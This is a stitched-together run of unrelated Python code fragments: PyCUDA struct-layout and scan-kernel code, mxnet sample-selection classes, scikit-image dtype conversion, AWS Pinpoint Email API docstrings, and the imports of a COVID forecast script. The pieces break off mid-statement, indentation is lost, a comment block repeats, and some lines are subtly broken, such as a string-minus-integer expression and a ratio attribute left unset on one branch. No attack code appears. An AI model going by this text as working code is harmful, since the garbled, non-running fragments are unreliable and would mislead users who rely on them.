c_fields.append(" %s %s;" % (dtype_to_ctype(field_dtype), field_name))
if use_typedef:
c_decl = "typedef struct {\n%s\n} %s;\n\n" % (
"\n".join(c_fields), name
)
else:
c_decl = "struct %s {\n%s\n};\n\n" % (
name, "\n".join(c_fields)
)
cdl = _CDeclList(device)
for field_name, dtype_and_offset in fields:
field_dtype, offset = dtype_and_offset[:2]
cdl.add_dtype(field_dtype)
pre_decls = cdl.get_declarations()
offset_code = "\n".join(
"result[%d] = pycuda_offsetof(%s, %s);" % (i + 1, name, field_name)
for i, (field_name, _) in enumerate(fields))
src = r"""
#define pycuda_offsetof(st, m) \
((uint) ((char *) &(dummy_pycuda.m) \
- (char *)&dummy_pycuda ))
%(pre_decls)s
%(my_decl)s
extern "C" __global__ void get_size_and_offsets(uint *result)
{
result[0] = sizeof(%(my_type)s);
%(my_type)s dummy_pycuda;
%(offset_code)s
}
""" % dict(
pre_decls=pre_decls,
my_decl=c_decl,
my_type=name,
offset_code=offset_code)
prg = SourceModule(src)
knl = prg.get_size_and_offsets
result_buf = gpuarray.empty(1 + len(fields), np.uint32)
e = drv.Event()
knl(result_buf.gpudata, block=(1, 1, 1))
e.record()
e.synchronize()
size_and_offsets = result_buf.get()
size = int(size_and_offsets[0])
from pytools import any
offsets = size_and_offsets[1:]
if any(ofs >= size for ofs in offsets):
# offsets not plausible
if dtype.itemsize == size:
# If sizes match, use numpy's idea of the offsets.
offsets = [dtype_and_offset[1]
for field_name, dtype_and_offset in fields]
else:
raise RuntimeError(
"OpenCL compiler reported offsetof() past sizeof() "
"for struct layout on '%s'. "
"This makes no sense, and it's usually indicates a "
"compiler bug. "
"Refusing to discover struct layout." % device)
del knl
del prg
del context
try:
dtype_arg_dict = {
'names': [field_name
for field_name, (field_dtype, offset) in fields],
'formats': [field_dtype
for field_name, (field_dtype, offset) in fields],
'offsets': [int(x) for x in offsets],
'itemsize': int(size_and_offsets[0]),
}
dtype = np.dtype(dtype_arg_dict)
if dtype.itemsize != size_and_offsets[0]:
# "Old" versions of numpy (1.6.x?) silently ignore "itemsize". Boo.
dtype_arg_dict["names"].append("_pycl_size_fixer")
dtype_arg_dict["formats"].append(np.uint8)
dtype_arg_dict["offsets"].append(int(size_and_offsets[0]) - 1)
dtype = np.dtype(dtype_arg_dict)
except NotImplementedError:
def calc_field_type():
total_size = 0
padding_count = 0
for offset, (field_name, (field_dtype, _)) in zip(offsets, fields):
if offset > total_size:
padding_count += 1
yield ('__pycuda_padding%d' % padding_count,
'V%d' % offset - total_size)
yield field_name, field_dtype
total_size = field_dtype.itemsize + offset
dtype = np.dtype(list(calc_field_type()))
assert dtype.itemsize == size_and_offsets[0]
return dtype, c_decl
@memoize
def dtype_to_c_struct(device, dtype):
if dtype.fields is None:
return ""
import pyopencl.cltypes
if dtype in pyopencl.cltypes.vec_type_to_scalar_and_count:
# Vector types are built-in. Don't try to redeclare those.
return ""
matched_dtype, c_decl = match_dtype_to_c_struct(
device, dtype_to_ctype(dtype), dtype)
def dtypes_match():
result = len(dtype.fields) == len(matched_dtype.fields)
for name, val in six.iteritems(dtype.fields):
result = result and matched_dtype.fields[name] == val
return result
assert dtypes_match()
return c_decl
#####################################################################
# The GenericScanKernel is added here temporarily until the following
# PR is merged into PyCUDA
# https://github.com/inducer/pycuda/pull/188
#####################################################################
logger = logging.getLogger(__name__)
#####################################################################
# The GenericScanKernel is added here temporarily until the following
# PR is merged into PyCUDA
# https://github.com/inducer/pycuda/pull/188
#####################################################################
def parse_arg_list(arguments):
"""Parse a list of kernel arguments. *arguments* may be a comma-separate
list of C declarators in a string, a list of strings representing C
declarators, or :class:`Argument` objects.
"""
if isinstance(arguments, str):
arguments = arguments.split(",")
def parse_single_arg(obj):
if isinstance(obj, str):
from pycuda.tools import parse_c_arg
return parse_c_arg(obj)
else:
return obj
return [parse_single_arg(arg) for arg in arguments]
def get_arg_list_scalar_arg_dtypes(arg_types):
result = []
for arg_type in arg_types:
if isinstance(arg_type, ScalarArg):
result.append(arg_type.dtype)
elif isinstance(arg_type, VectorArg):
result.append(None)
else:
raise RuntimeError("arg type not understood: %s" % type(arg_type))
return result
def _process_code_for_macro(code):
if "//" in code:
raise RuntimeError("end-of-line comments ('//') may not be used in "
"code snippets")
return code.replace("\n", " \\\n")
class _NumpyTypesKeyBuilder(KeyBuilderBase):
def update_for_type(self, key_hash, key):
if issubclass(key, np.generic):
self.update_for_str(key_hash, key.__name__)
return
raise TypeError("unsupported type for persistent hash keying: %s"
% type(key))
# {{{ preamble
SHARED_PREAMBLE = CLUDA_PREAMBLE + """
#define WG_SIZE ${wg_size}
#define SCAN_EXPR(a, b, across_seg_boundary) ${scan_expr}
#define INPUT_EXPR(i) (${input_expr})
%if is_segmented:
#define IS_SEG_START(i, a) (${is_segment_start_expr})
%endif
${preamble}
typedef ${dtype_to_ctype(scan_dtype)} scan_type;
typedef ${dtype_to_ctype(index_dtype)} index_type;
// NO_SEG_BOUNDARY is the largest representable integer in index_type.
// This assumption is used in code below.
#define NO_SEG_BOUNDARY ${str(np.iinfo(index_dtype).max)}
"""
# }}}
# {{{ main scan code
# Algorithm: Each work group is responsible for one contiguous
# 'interval'. There are just enough intervals to fill all compute
# units. Intervals are split into 'units'. A unit is what gets
# worked on in parallel by one work group.
#
# in index space:
# interval > unit > local-parallel > k-group
#
# (Note that there is also a transpose in here: The data is read
# with local ids along linear index order.)
#
# Each unit has two axes--the local-id axis and the k axis.
#
# unit 0:
# | | | | | | | | | | ----> lid
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
#
# |
# v k (fastest-moving in linear index)
#
# unit 1:
# | | | | | | | | | | ----> lid
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
#
# |
# v k (fastest-moving in linear index)
#
# ...
#
# At a device-global level, this is a three-phase algorithm, in
# which first each interval does its local scan, then a scan
# across intervals exchanges data globally, and the final update
# adds the exchanged sums to each interval.
#
# Exclusive scan is realized by allowing look-behind (access to the
# preceding item) in the final update, by means of a local shift.
#
# NOTE: All segment_start_in_X indices are relative to the start
# of the array.
SCAN_INTERVALS_SOURCE = SHARED_PREAMBLE + r"""
#define K ${k_group_size}
// #define DEBUG
#ifdef DEBUG
#define pycu_printf(ARGS) printf ARGS
#else
#define pycu_printf(ARGS) /* */
#endif
KERNEL
REQD_WG_SIZE(WG_SIZE, 1, 1)
void ${kernel_name}(
${argument_signature},
GLOBAL_MEM scan_type* __restrict__ partial_scan_buffer,
const index_type N,
const index_type interval_size
%if is_first_level:
, GLOBAL_MEM scan_type* __restrict__ interval_results
%endif
%if is_segmented and is_first_level:
// NO_SEG_BOUNDARY if no | |
# pylint: disable=arguments-differ, unused-argument
"""Samplers for positive/negative/ignore sample selections.
This module is used to select samples during training.
Based on different strategies, we would like to choose different number of
samples as positive, negative or ignore(don't care). The purpose is to alleviate
unbalanced training target in some circumstances.
The output of sampler is an NDArray of the same shape as the matching results.
Note: 1 for positive, -1 for negative, 0 for ignore.
"""
from __future__ import absolute_import
import random
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet import nd
from mxnet.gluon.data import Sampler
class NaiveSampler(gluon.HybridBlock):
"""A naive sampler that take all existing matching results.
There is no ignored sample in this case.
"""
def __init__(self):
super(NaiveSampler, self).__init__()
def hybrid_forward(self, F, x):
"""Hybrid forward"""
marker = F.ones_like(x)
y = F.where(x >= 0, marker, marker * -1)
return y
class OHEMSampler(gluon.Block):
"""A sampler implementing Online Hard-negative mining.
As described in paper https://arxiv.org/abs/1604.03540.
Parameters
----------
ratio : float
Ratio of negative vs. positive samples. Values >= 1.0 is recommended.
min_samples : int, default 0
Minimum samples to be selected regardless of positive samples.
For example, if positive samples is 0, we sometimes still want some num_negative
samples to be selected.
thresh : float, default 0.5
IOU overlap threshold of selected negative samples. IOU must not exceed
this threshold such that good matching anchors won't be selected as
negative samples.
"""
def __init__(self, ratio, min_samples=0, thresh=0.5):
super(OHEMSampler, self).__init__()
assert ratio > 0, "OHEMSampler ratio must > 0, {} given".format(ratio)
self._ratio = ratio
self._min_samples = min_samples
self._thresh = thresh
# pylint: disable=arguments-differ
def forward(self, x, logits, ious):
"""Forward"""
F = nd
num_positive = F.sum(x > -1, axis=1)
num_negative = self._ratio * num_positive
num_total = x.shape[1] # scalar
num_negative = F.minimum(F.maximum(self._min_samples, num_negative),
num_total - num_positive)
positive = logits.slice_axis(axis=2, begin=1, end=None)
background = logits.slice_axis(axis=2, begin=0, end=1).reshape((0, -1))
maxval = positive.max(axis=2)
esum = F.exp(logits - maxval.reshape((0, 0, 1))).sum(axis=2)
score = -F.log(F.exp(background - maxval) / esum)
mask = F.ones_like(score) * -1
score = F.where(x < 0, score, mask) # mask out positive samples
if len(ious.shape) == 3:
ious = F.max(ious, axis=2)
score = F.where(ious < self._thresh, score, mask) # mask out if iou is large
argmaxs = F.argsort(score, axis=1, is_ascend=False)
# neg number is different in each batch, using dynamic numpy operations.
y = np.zeros(x.shape)
y[np.where(x.asnumpy() >= 0)] = 1 # assign positive samples
argmaxs = argmaxs.asnumpy()
for i, num_neg in zip(range(x.shape[0]), num_negative.asnumpy().astype(np.int32)):
indices = argmaxs[i, :num_neg]
y[i, indices.astype(np.int32)] = -1 # assign negative samples
return F.array(y, ctx=x.context)
class QuotaSampler(gluon.Block):
"""Sampler that handles limited quota for positive and negative samples.
Parameters
----------
num_sample : int, default is 128
Number of samples for RCNN targets.
pos_iou_thresh : float, default is 0.5
Proposal whose IOU larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh_high : float, default is 0.5
Proposal whose IOU smaller than ``neg_iou_thresh_high``
and larger than ``neg_iou_thresh_low``
is regarded as negative samples.
Proposals with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
neg_iou_thresh_low : float, default is 0.0
See ``neg_iou_thresh_high``.
pos_ratio : float, default is 0.25
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
neg_ratio : float or None
``neg_ratio`` defines how many negative samples (``pos_ratio * num_sample``) is
to be sampled. If ``None`` is provided, it equals to ``1 - pos_ratio``.
fill_negative : bool
If ``True``, negative samples will fill the gap caused by insufficient positive samples.
For example, if ``num_sample`` is 100, ``pos_ratio`` and ``neg_ratio`` are both ``0.5``.
Available positive sample and negative samples are 10 and 10000, which are typical values.
Now, the output positive samples is 10(intact), since it's smaller than ``50(100 * 0.5)``,
the negative samples will fill the rest ``40`` slots.
If ``fill_negative == False``, the ``40`` slots is filled with ``-1(ignore)``.
"""
def __init__(self, num_sample, pos_thresh, neg_thresh_high, neg_thresh_low=-np.inf,
pos_ratio=0.5, neg_ratio=None, fill_negative=True):
super(QuotaSampler, self).__init__()
self._fill_negative = fill_negative
self._num_sample = num_sample
if neg_ratio is None:
self._neg_ratio = 1. - pos_ratio
self._pos_ratio = pos_ratio
assert (self._neg_ratio + self._pos_ratio) <= 1.0, (
"Positive and negative ratio {} exceed 1".format(self._neg_ratio + self._pos_ratio))
self._pos_thresh = min(1., max(0., pos_thresh))
self._neg_thresh_high = min(1., max(0., neg_thresh_high))
self._neg_thresh_low = neg_thresh_low
def forward(self, matches, ious):
"""Quota Sampler
Parameters:
----------
matches : NDArray or Symbol
Matching results, positive number for positive matching, -1 for not matched.
ious : NDArray or Symbol
IOU overlaps with shape (N, M), batching is supported.
Returns:
--------
NDArray or Symbol
Sampling results with same shape as ``matches``.
1 for positive, -1 for negative, 0 for ignore.
"""
F = mx.nd
max_pos = int(round(self._pos_ratio * self._num_sample))
max_neg = int(self._neg_ratio * self._num_sample)
results = []
for i in range(matches.shape[0]):
# init with 0s, which are ignored
result = F.zeros_like(matches[0])
# positive samples
ious_max = ious.max(axis=-1)[i]
result = F.where(matches[i] >= 0, F.ones_like(result), result)
result = F.where(ious_max >= self._pos_thresh, F.ones_like(result), result)
# negative samples with label -1
neg_mask = ious_max < self._neg_thresh_high
neg_mask = neg_mask * (ious_max >= self._neg_thresh_low)
result = F.where(neg_mask, F.ones_like(result) * -1, result)
# re-balance if number of positive or negative exceed limits
result = result.asnumpy()
num_pos = int((result > 0).sum())
if num_pos > max_pos:
disable_indices = np.random.choice(
np.where(result > 0)[0], size=(num_pos - max_pos), replace=False)
result[disable_indices] = 0 # use 0 to ignore
num_neg = int((result < 0).sum())
if self._fill_negative:
# if pos_sample is less than quota, we can have negative samples filling the gap
max_neg = max(self._num_sample - min(num_pos, max_pos), max_neg)
if num_neg > max_neg:
disable_indices = np.random.choice(
np.where(result < 0)[0], size=(num_neg - max_neg), replace=False)
result[disable_indices] = 0
results.append(mx.nd.array(result))
return mx.nd.stack(*results, axis=0)
class QuotaSamplerOp(mx.operator.CustomOp):
"""Sampler that handles limited quota for positive and negative samples.
This is a custom Operator used inside HybridBlock.
Parameters
----------
num_sample : int, default is 128
Number of samples for RCNN targets.
pos_iou_thresh : float, default is 0.5
Proposal whose IOU larger than ``pos_iou_thresh`` is regarded as positive samples.
neg_iou_thresh_high : float, default is 0.5
Proposal whose IOU smaller than ``neg_iou_thresh_high``
and larger than ``neg_iou_thresh_low``
is regarded as negative samples.
Proposals with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
neg_iou_thresh_low : float, default is 0.0
See ``neg_iou_thresh_high``.
pos_ratio : float, default is 0.25
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) is
to be sampled.
neg_ratio : float or None
``neg_ratio`` defines how many negative samples (``pos_ratio * num_sample``) is
to be sampled. If ``None`` is provided, it equals to ``1 - pos_ratio``.
fill_negative : bool
If ``True``, negative samples will fill the gap caused by insufficient positive samples.
For example, if ``num_sample`` is 100, ``pos_ratio`` and ``neg_ratio`` are both ``0.5``.
Available positive sample and negative samples are 10 and 10000, which are typical values.
Now, the output positive samples is 10(intact), since it's smaller than ``50(100 * 0.5)``,
the negative samples will fill the rest ``40`` slots.
If ``fill_negative == False``, the ``40`` slots is filled with ``-1(ignore)``.
"""
def __init__(self, num_sample, pos_thresh, neg_thresh_high=0.5, neg_thresh_low=-np.inf,
pos_ratio=0.5, neg_ratio=None, fill_negative=True):
super(QuotaSamplerOp, self).__init__()
self._num_sample = num_sample
self._fill_negative = fill_negative
if neg_ratio is None:
self._neg_ratio = 1. - pos_ratio
self._pos_ratio = pos_ratio
assert (self._neg_ratio + self._pos_ratio) <= 1.0, (
"Positive and negative ratio {} exceed 1".format(self._neg_ratio + self._pos_ratio))
self._pos_thresh = min(1., max(0., pos_thresh))
self._neg_thresh_high = min(1., max(0., neg_thresh_high))
self._neg_thresh_low = neg_thresh_low
def forward(self, is_train, req, in_data, out_data, aux):
"""Quota Sampler
Parameters:
----------
in_data: array-like of Symbol
[matches, ious], see below.
matches : NDArray or Symbol
Matching results, positive number for positive matching, -1 for not matched.
ious : NDArray or Symbol
IOU overlaps with shape (N, M), batching is supported.
Returns:
--------
NDArray or Symbol
Sampling results with same shape as ``matches``.
1 for positive, -1 for negative, 0 for ignore.
"""
matches = in_data[0]
ious = in_data[1]
F = mx.nd
max_pos = int(round(self._pos_ratio * self._num_sample))
max_neg = int(self._neg_ratio * self._num_sample)
for i in range(matches.shape[0]):
# init with 0s, which are ignored
result = F.zeros_like(matches[i])
# negative samples with label -1
ious_max = ious.max(axis=-1)[i]
neg_mask = ious_max < self._neg_thresh_high
neg_mask = neg_mask * | |
Illuminant=D65
# NOTE: this is actually the XYZ values for the illuminant above.
lab_ref_white = np.array([0.95047, 1., 1.08883])
# XYZ coordinates of the illuminants, scaled to [0, 1]. For each illuminant I
# we have:
#
# illuminant[I][0] corresponds to the XYZ coordinates for the 2 degree
# field of view.
#
# illuminant[I][1] corresponds to the XYZ coordinates for the 10 degree
# field of view.
#
# The XYZ coordinates are calculated from [1], using the formula:
#
# X = x * ( Y / y )
# Y = Y
# Z = ( 1 - x - y ) * ( Y / y )
#
# where Y = 1. The only exception is the illuminant "D65" with aperture angle
# 2, whose coordinates are copied from 'lab_ref_white' for
# backward-compatibility reasons.
#
# References
# ----------
# .. [1] https://en.wikipedia.org/wiki/Standard_illuminant
illuminants = \
{"A": {'2': (1.098466069456375, 1, 0.3558228003436005),
'10': (1.111420406956693, 1, 0.3519978321919493)},
"D50": {'2': (0.9642119944211994, 1, 0.8251882845188288),
'10': (0.9672062750333777, 1, 0.8142801513128616)},
"D55": {'2': (0.956797052643698, 1, 0.9214805860173273),
'10': (0.9579665682254781, 1, 0.9092525159847462)},
"D65": {'2': (0.95047, 1., 1.08883), # This was: `lab_ref_white`
'10': (0.94809667673716, 1, 1.0730513595166162)},
"D75": {'2': (0.9497220898840717, 1, 1.226393520724154),
'10': (0.9441713925645873, 1, 1.2064272211720228)},
"E": {'2': (1.0, 1.0, 1.0),
'10': (1.0, 1.0, 1.0)}}
__all__ = ['img_as_float32', 'img_as_float64', 'img_as_float',
#'img_as_int', 'img_as_uint', 'img_as_ubyte',
#'img_as_bool',
'dtype_limits']
# For integers Numpy uses `_integer_types` basis internally, and builds a leaky
# `np.XintYY` abstraction on top of it. This leads to situations when, for
# example, there are two np.Xint64 dtypes with the same attributes but
# different object references. In order to avoid any potential issues,
# we use the basis dtypes here. For more information, see:
# - https://github.com/scikit-image/scikit-image/issues/3043
# For convenience, for these dtypes we indicate also the possible bit depths
# (some of them are platform specific). For the details, see:
# http://www.unix.org/whitepapers/64bit.html
_integer_types = (np.byte, np.ubyte, # 8 bits
np.short, np.ushort, # 16 bits
np.intc, np.uintc, # 16 or 32 or 64 bits
np.int_, np.uint, # 32 or 64 bits
np.longlong, np.ulonglong) # 64 bits
_integer_ranges = {t: (np.iinfo(t).min, np.iinfo(t).max)
for t in _integer_types}
dtype_range = {np.bool_: (False, True),
np.bool8: (False, True),
np.float16: (-1, 1),
np.float32: (-1, 1),
np.float64: (-1, 1)}
dtype_range.update(_integer_ranges)
_supported_types = list(dtype_range.keys())
def dtype_limits(image, clip_negative=False):
"""Return intensity limits, i.e. (min, max) tuple, of the image's dtype.
Parameters
----------
image : ndarray
Input image.
clip_negative : bool, optional
If True, clip the negative range (i.e. return 0 for min intensity)
even if the image dtype allows negative values.
Returns
-------
imin, imax : tuple
Lower and upper intensity limits.
"""
imin, imax = dtype_range[image.dtype.type]
if clip_negative:
imin = 0
return imin, imax
def _dtype_itemsize(itemsize, *dtypes):
"""Return first of `dtypes` with itemsize greater than `itemsize`
Parameters
----------
itemsize: int
The data type object element size.
Other Parameters
----------------
*dtypes:
Any Object accepted by `np.dtype` to be converted to a data
type object
Returns
-------
dtype: data type object
First of `dtypes` with itemsize greater than `itemsize`.
"""
return next(dt for dt in dtypes if np.dtype(dt).itemsize >= itemsize)
def _dtype_bits(kind, bits, itemsize=1):
"""Return dtype of `kind` that can store a `bits` wide unsigned int
Parameters:
kind: str
Data type kind.
bits: int
Desired number of bits.
itemsize: int
The data type object element size.
Returns
-------
dtype: data type object
Data type of `kind` that can store a `bits` wide unsigned int
"""
s = next(i for i in (itemsize, ) + (2, 4, 8) if
bits < (i * 8) or (bits == (i * 8) and kind == 'u'))
return np.dtype(kind + str(s))
def _scale(a, n, m, copy=True):
"""Scale an array of unsigned/positive integers from `n` to `m` bits.
Numbers can be represented exactly only if `m` is a multiple of `n`.
Parameters
----------
a : ndarray
Input image array.
n : int
Number of bits currently used to encode the values in `a`.
m : int
Desired number of bits to encode the values in `out`.
copy : bool, optional
If True, allocates and returns new array. Otherwise, modifies
`a` in place.
Returns
-------
out : array
Output image array. Has the same kind as `a`.
"""
kind = a.dtype.kind
if n > m and a.max() < 2 ** m:
mnew = int(np.ceil(m / 2) * 2)
if mnew > m:
dtype = "int{}".format(mnew)
else:
dtype = "uint{}".format(mnew)
n = int(np.ceil(n / 2) * 2)
warn("Downcasting {} to {} without scaling because max "
"value {} fits in {}".format(a.dtype, dtype, a.max(), dtype),
stacklevel=3)
return a.astype(_dtype_bits(kind, m))
elif n == m:
return a.copy() if copy else a
elif n > m:
# downscale with precision loss
if copy:
b = np.empty(a.shape, _dtype_bits(kind, m))
np.floor_divide(a, 2**(n - m), out=b, dtype=a.dtype,
casting='unsafe')
return b
else:
a //= 2**(n - m)
return a
elif m % n == 0:
# exact upscale to a multiple of `n` bits
if copy:
b = np.empty(a.shape, _dtype_bits(kind, m))
np.multiply(a, (2**m - 1) // (2**n - 1), out=b, dtype=b.dtype)
return b
else:
a = a.astype(_dtype_bits(kind, m, a.dtype.itemsize), copy=False)
a *= (2**m - 1) // (2**n - 1)
return a
else:
# upscale to a multiple of `n` bits,
# then downscale with precision loss
o = (m // n + 1) * n
if copy:
b = np.empty(a.shape, _dtype_bits(kind, o))
np.multiply(a, (2**o - 1) // (2**n - 1), out=b, dtype=b.dtype)
b //= 2**(o - m)
return b
else:
a = a.astype(_dtype_bits(kind, o, a.dtype.itemsize), copy=False)
a *= (2**o - 1) // (2**n - 1)
a //= 2**(o - m)
return a
def convert(image, dtype, force_copy=False, uniform=False):
"""
Convert an image to the requested data-type.
Warnings are issued in case of precision loss, or when negative values
are clipped during conversion to unsigned integer types (sign loss).
Floating point values are expected to be normalized and will be clipped
to the range [0.0, 1.0] or [-1.0, 1.0] when converting to unsigned or
signed integers respectively.
Numbers are not shifted to the negative side when converting from
unsigned to signed integer types. Negative values will be clipped when
converting to unsigned integers.
Parameters
----------
image : ndarray
Input image.
dtype : dtype
Target data-type.
force_copy : bool, optional
Force a copy of the data, irrespective of its current dtype.
uniform : bool, optional
Uniformly quantize the floating point range to the integer range.
By default (uniform=False) floating point values are scaled and
rounded to the nearest integers, which minimizes back and forth
conversion errors.
.. versionchanged :: 0.15
``convert`` no longer warns about possible precision or sign
information loss. See discussions on these warnings at:
https://github.com/scikit-image/scikit-image/issues/2602
https://github.com/scikit-image/scikit-image/issues/543#issuecomment-208202228
https://github.com/scikit-image/scikit-image/pull/3575
References
----------
.. [1] DirectX data conversion rules.
https://msdn.microsoft.com/en-us/library/windows/desktop/dd607323%28v=vs.85%29.aspx
.. [2] Data Conversions. In "OpenGL ES 2.0 Specification v2.0.25",
pp 7-8. Khronos Group, 2010.
.. [3] Proper treatment of pixels as integers. <NAME>.
In "Graphics Gems I", pp 249-256. <NAME>, 1990.
.. [4] Dirty Pixels. <NAME>. In "Jim Blinn's corner: Dirty Pixels",
pp 47-57. <NAME>, 1998.
"""
image = np.asarray(image)
dtypeobj_in = image.dtype
if dtype is np.floating:
dtypeobj_out = np.dtype("float64")
else:
dtypeobj_out = np.dtype(dtype)
dtype_in = dtypeobj_in.type
dtype_out = dtypeobj_out.type
kind_in = dtypeobj_in.kind
kind_out = dtypeobj_out.kind
itemsize_in = dtypeobj_in.itemsize
itemsize_out = dtypeobj_out.itemsize
# Below, we do an `issubdtype` check. Its purpose is to find out
# whether we can get away without doing any image conversion. This happens
# when:
#
# - the output and input dtypes are the same or
# - when the output is specified as a type, and the input dtype
# is a subclass of that type (e.g. `np.floating` will allow
# `float32` and `float64` arrays through)
if np.issubdtype(dtype_in, np.obj2sctype(dtype)):
if force_copy:
image = image.copy()
return image
if not (dtype_in in _supported_types and dtype_out in _supported_types):
raise ValueError("Can not convert from {} to {}."
.format(dtypeobj_in, dtypeobj_out))
if kind_in in 'ui':
imin_in = np.iinfo(dtype_in).min
imax_in = np.iinfo(dtype_in).max
if kind_out in 'ui':
imin_out = np.iinfo(dtype_out).min
imax_out = np.iinfo(dtype_out).max
# any -> binary
if kind_out == 'b':
return image > dtype_in(dtype_range[dtype_in][1] / 2)
# binary -> any
if kind_in == 'b':
result = image.astype(dtype_out)
if kind_out != 'f':
| |
Raw message.
- **Simple** *(dict) --*
The simple email message. The message consists of a subject and a message body.
- **Subject** *(dict) --* **[REQUIRED]**
The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 <https://tools.ietf.org/html/rfc2047>`__ .
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Body** *(dict) --* **[REQUIRED]**
The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.
- **Text** *(dict) --*
An object that represents the version of the message that is displayed in email clients that don\'t support HTML, or clients where the recipient has disabled HTML rendering.
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Html** *(dict) --*
An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.
- **Data** *(string) --* **[REQUIRED]**
The content of the message itself.
- **Charset** *(string) --*
The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .
- **Raw** *(dict) --*
The raw email message. The message has to meet the following criteria:
* The message has to contain a header and a body, separated by one blank line.
* All of the required header fields must be present in the message.
* Each part of a multipart MIME message must be formatted properly.
* If you include attachments, they must be in a file format that Amazon Pinpoint supports.
* The entire message must be Base64 encoded.
* If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\' email clients render the message properly.
* The length of any single line of text in the message can\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 <https://tools.ietf.org/html/rfc5321>`__ .
- **Data** *(bytes) --* **[REQUIRED]**
The raw email message. The message has to meet the following criteria:
* The message has to contain a header and a body, separated by one blank line.
* All of the required header fields must be present in the message.
* Each part of a multipart MIME message must be formatted properly.
* Attachments must be in a file format that Amazon Pinpoint supports.
* The entire message must be Base64 encoded.
* If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\' email clients render the message properly.
* The length of any single line of text in the message can\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 <https://tools.ietf.org/html/rfc5321>`__ .
:type EmailTags: list
:param EmailTags:
A list of tags, in the form of name/value pairs, to apply to an email that you send using the ``SendEmail`` operation. Tags correspond to characteristics of the email that you define, so that you can publish email sending events.
- *(dict) --*
Contains the name and value of a tag that you apply to an email. You can use message tags when you publish email sending events.
- **Name** *(string) --* **[REQUIRED]**
The name of the message tag. The message tag name has to meet the following criteria:
* It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).
* It can contain no more than 256 characters.
- **Value** *(string) --* **[REQUIRED]**
The value of the message tag. The message tag value has to meet the following criteria:
* It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).
* It can contain no more than 256 characters.
:type ConfigurationSetName: string
:param ConfigurationSetName:
The name of the configuration set that you want to use when sending the email.
:rtype: dict
:returns:
"""
pass
def tag_resource(self, ResourceArn: str, Tags: List) -> Dict:
"""
Add one or more tags (keys and values) to one or more specified resources. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.
Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for more specific tag values. A tag value acts as a descriptor within a tag key.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/TagResource>`_
**Request Syntax**
::
response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the resource that you want to add one or more tags to.
:type Tags: list
:param Tags: **[REQUIRED]**
A list of the tags that you want to add to the resource. A tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` ). The maximum length of a tag key is 128 characters. The maximum length of a tag value is 256 characters.
- *(dict) --*
An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.
Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.
A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:
* Tag keys and values are case sensitive.
* For each associated resource, each tag key must be unique and it can have | |
<reponame>levidantzinger/hawaii_covid_forecast
#########################################################
############### ~ Import Libraries ~ ####################
#########################################################
import numpy as np
import pandas as pd
import scipy.integrate as integrate
from dd_model.model import run_scenario
from bokeh.plotting import figure, output_file, show
from bokeh.models import ColumnDataSource
from bokeh.models.tools import HoverTool
from datetime import datetime, date, timedelta
from dateutil.parser import parse
from bokeh.models import HoverTool
from bokeh.models.widgets import Tabs, Panel
import csv
import json
import time
from bokeh.resources import CDN
from bokeh.embed import file_html
import plotly.graph_objects as go
import plotly.express as px
from plotly.subplots import make_subplots
import chart_studio.plotly as py
import chart_studio
from hdc_api.sheets import get_test_positivity, get_rt, get_cases, get_hdc_covid_data
